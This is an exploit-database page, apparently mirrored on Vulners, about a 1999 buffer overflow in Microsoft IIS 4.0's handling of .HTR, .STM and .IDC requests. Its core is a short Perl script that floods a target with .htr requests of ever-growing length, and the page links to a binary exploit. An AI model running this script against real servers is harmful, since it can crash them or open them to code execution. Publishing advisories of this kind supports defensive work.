Microsoft IIS 4.0 - Remote Buffer Overflow (1)
🗓️ 15 Jun 1999 00:00:00Reported by eEye Digital Security TeamType
exploitdb🔗 www.exploit-db.com👁 34 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-1999-0874 | 30 Apr 201000:00 | – | circl | |
| CVE-1999-0874 | 2 Jun 200004:00 | – | cve | |
| CVE-1999-0874 | 2 Jun 200004:00 | – | cvelist | |
| Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit) | 30 Apr 201000:00 | – | exploitdb | |
| Microsoft IIS 4.0 - Remote Buffer Overflow (2) | 15 Jun 199900:00 | – | exploitdb | |
| Microsoft IIS 4.0 - Remote Buffer Overflow (3) | 15 Jun 199900:00 | – | exploitdb | |
| Microsoft IIS 4.0 - Remote Buffer Overflow (4) | 15 Jun 199900:00 | – | exploitdb | |
| Microsoft IIS 4.0 - Remote Buffer Overflow (2) | 15 Jun 199900:00 | – | exploitpack | |
| Microsoft IIS ISM.DLL HTR Request Remote Overflow | 22 Jun 199900:00 | – | nessus | |
| MS02-018 Microsoft IIS 4.0 .HTR Path Overflow | 21 Jan 200622:10 | – | metasploit |
10
source: https://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
Use the following script to test your site:
#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19245.exeData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.74651